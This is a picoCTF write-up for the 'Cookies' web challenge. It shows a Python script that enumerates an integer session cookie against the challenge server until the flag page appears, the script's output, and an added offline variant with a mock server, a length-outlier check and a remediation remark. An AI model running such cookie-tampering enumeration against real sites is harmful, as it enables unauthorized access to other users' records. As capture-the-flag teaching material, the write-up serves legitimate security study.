Description
Who doesn’t love cookies? Try to figure out the best one. http://mercury.picoctf.net:29649/
Steps:
On that webpage I tried random names and checked the response, but didn't get anything interesting. Instead I typed snickerdoodle,
which is the word suggested in the input. After searching for it I got a response. Then I went back to the home page, http://mercury.picoctf.net:29649, but there is no home page; I was still on http://mercury.picoctf.net:29649/check.
Every time I reload I'm redirected to /check, which is kind of suspicious, and when I clicked Home it redirected me to home again. I opened Chrome DevTools > Inspect > Application > Cookies and saw something interesting: the cookie value is -1.
It stays -1 when I'm on home and even when I submit an invalid cookie name; after I search for snickerdoodle
it changes to 1. So I changed the cookie value to 2
and refreshed the page, after which I got **I love oatmeal raisin cookies!**
So the content is basically chosen by the cookie value. Let's brute-force the cookie value; I created this code (using ChatGPT) to brute-force it:
```python
#!/bin/python3
import requests

# Loop through values from 0 to 24
for i in range(25):
    # Create the cookie value
    cookie = f'name={i}'
    headers = {'Cookie': cookie}
    print(f"[*] Trying cookie value: {cookie}")  # Show current cookie being tested
    # Send GET request with the current cookie
    r = requests.get('http://mercury.picoctf.net:<port>/check', headers=headers)
    print(f"[*] Status Code: {r.status_code}")  # Show response status code
    print(f"[*] Response Length: {len(r.text)} characters")  # Show response size
    # Check if the response contains "picoCTF" (meaning we found the flag)
    if (r.status_code == 200) and ('picoCTF' in r.text):
        print("\n[🎉] Flag Found! Response:")
        print(r.text)  # Print the full response
        break  # Stop looping once flag is found
    print("-" * 50)  # Separator for readability
```
Result:
```text
└─$ python script.py
[*] Trying cookie value: name=0
[*] Status Code: 200
[*] Response Length: 1779 characters
--------------------------------------------------
[*] Trying cookie value: name=1
[*] Status Code: 200
[*] Response Length: 1780 characters
--------------------------------------------------
[*] Trying cookie value: name=2
[*] Status Code: 200
[*] Response Length: 1780 characters
--------------------------------------------------
[*] Trying cookie value: name=3
[*] Status Code: 200
[*] Response Length: 1776 characters
--------------------------------------------------
[*] Trying cookie value: name=4
[*] Status Code: 200
[*] Response Length: 1776 characters
--------------------------------------------------
[*] Trying cookie value: name=5
[*] Status Code: 200
[*] Response Length: 1779 characters
--------------------------------------------------
[*] Trying cookie value: name=6
[*] Status Code: 200
[*] Response Length: 1777 characters
--------------------------------------------------
[*] Trying cookie value: name=7
[*] Status Code: 200
[*] Response Length: 1771 characters
--------------------------------------------------
[*] Trying cookie value: name=8
[*] Status Code: 200
[*] Response Length: 1774 characters
--------------------------------------------------
[*] Trying cookie value: name=9
[*] Status Code: 200
[*] Response Length: 1770 characters
--------------------------------------------------
[*] Trying cookie value: name=10
[*] Status Code: 200
[*] Response Length: 1774 characters
--------------------------------------------------
[*] Trying cookie value: name=11
[*] Status Code: 200
[*] Response Length: 1772 characters
--------------------------------------------------
[*] Trying cookie value: name=12
[*] Status Code: 200
[*] Response Length: 1772 characters
--------------------------------------------------
[*] Trying cookie value: name=13
[*] Status Code: 200
[*] Response Length: 1774 characters
--------------------------------------------------
[*] Trying cookie value: name=14
[*] Status Code: 200
[*] Response Length: 1770 characters
--------------------------------------------------
[*] Trying cookie value: name=15
[*] Status Code: 200
[*] Response Length: 1776 characters
--------------------------------------------------
[*] Trying cookie value: name=16
[*] Status Code: 200
[*] Response Length: 1774 characters
--------------------------------------------------
[*] Trying cookie value: name=17
[*] Status Code: 200
[*] Response Length: 1771 characters
--------------------------------------------------
[*] Trying cookie value: name=18
[*] Status Code: 200
[*] Response Length: 1184 characters

[🎉] Flag Found! Response:
<!DOCTYPE html>
<html lang="en">
<head>
<title>Cookies</title>
<link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css" rel="stylesheet">
<link href="https://getbootstrap.com/docs/3.3/examples/jumbotron-narrow/jumbotron-narrow.css" rel="stylesheet">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
</head>
<body>
<div class="container">
<div class="header">
<nav>
<ul class="nav nav-pills pull-right">
<li role="presentation"><a href="/reset" class="btn btn-link pull-right">Home</a>
</li>
</ul>
</nav>
<h3 class="text-muted">Cookies</h3>
</div>
<div class="jumbotron">
<p class="lead"></p>
<p style="text-align:center; font-size:30px;"><b>Flag</b>: <code>picoCTF{3v3ry1_l0v3s_c00k135_********}</code></p>
</div>
<footer class="footer">
<p>© PicoCTF</p>
</footer>
</div>
</body>
</html>
```
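The script above stops at the first body containing `picoCTF`, but the length column in its output already singles out name=18 (1184 characters against roughly 1770 for every other value) before the flag is even read, which is the signal to watch for when the winning page does not contain a known marker. The following is an added example, not code from the original writeup: it separates the enumeration from the network so it runs offline against a constructed `mock_fetch` (the fake flag, the page template and the assumption that the flag page is much shorter than the others are mine, modelled on the output above), extracts the flag with a regex, and reports length outliers relative to the median. `http_fetch` is a stdlib fetcher you can pass in place of the mock once the real base URL (with its port) is filled in.

```python
#!/usr/bin/env python3
"""Added example (not from the original writeup): enumerate an integer-valued
'name' cookie, pull a picoCTF{...} flag out of the first hit, and flag responses
whose length stands out from the rest, the tell visible in the writeup's output.
"""
import re
import statistics
import urllib.request
from typing import Callable, Iterable, List, Optional, Tuple

Fetch = Callable[[int], Tuple[int, str]]   # cookie value -> (HTTP status, body)
Observation = Tuple[int, int, int]          # (cookie value, status, body length)

FLAG_RE = re.compile(r"picoCTF\{[^}]*\}")


def http_fetch(base_url: str, value: int, timeout: float = 5.0) -> Tuple[int, str]:
    """Real fetcher: GET <base_url>/check with 'Cookie: name=<value>'.

    Stdlib only. Not called by the offline demo below; use
    functools.partial(http_fetch, "http://host:port") as the fetch argument.
    """
    req = urllib.request.Request(f"{base_url}/check",
                                 headers={"Cookie": f"name={value}"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status, resp.read().decode("utf-8", "replace")


def extract_flag(body: str) -> Optional[str]:
    """Return the first picoCTF{...} token in body, or None if there is none."""
    m = FLAG_RE.search(body)
    return m.group(0) if m else None


def enumerate_cookie(fetch: Fetch, candidates: Iterable[int]):
    """Try each candidate value in order and stop at the first 200 response that
    carries a flag. Returns (winning_value, flag, observations); the first two
    are None when no candidate produced a flag."""
    observations: List[Observation] = []
    for value in candidates:
        status, body = fetch(value)
        observations.append((value, status, len(body)))
        if status == 200:
            flag = extract_flag(body)
            if flag:
                return value, flag, observations
    return None, None, observations


def length_outliers(observations: List[Observation],
                    rel_threshold: float = 0.10) -> List[int]:
    """Cookie values whose body length differs from the median length by more
    than rel_threshold * median. Useful when the interesting page has no known
    marker: a page built from a different template is usually a different size."""
    lengths = [n for _, _, n in observations]
    if not lengths:
        return []
    median = statistics.median(lengths)
    return [v for v, _, n in observations if abs(n - median) > rel_threshold * median]


def mock_fetch(value: int) -> Tuple[int, str]:
    """Constructed stand-in for the challenge server (assumption: every non-flag
    value returns a ~1.7 KB page and the flag page is much shorter). The flag
    string here is fake."""
    template = ("<html><body><div class='jumbotron'>"
                "<p class='lead'>{}</p></div></body></html>")
    if value == 18:
        return 200, template.format(
            "Flag: <code>picoCTF{fake_flag_for_offline_demo}</code>")
    filler = "." * 1700  # pad so that every non-flag page is about the same size
    return 200, template.format(f"I love cookie number {value}!" + filler)


def main() -> None:
    value, flag, obs = enumerate_cookie(mock_fetch, range(25))
    for v, status, n in obs:
        print(f"[*] name={v:<3} status={status} length={n}")
    print(f"[*] flag at name={value}: {flag}")
    print(f"[*] length outliers: {length_outliers(obs)}")


if __name__ == "__main__":
    main()
```

Against the mock, the enumeration stops at name=18 and `length_outliers` reports the same value from the size alone; against the real server, the outlier check is the part worth keeping even when the marker string is unknown, and the integer cookie itself is the finding: the server lets the client pick which record it renders, so the fix is a server-side session keyed by a random token (or a signed cookie) rather than a trusted integer.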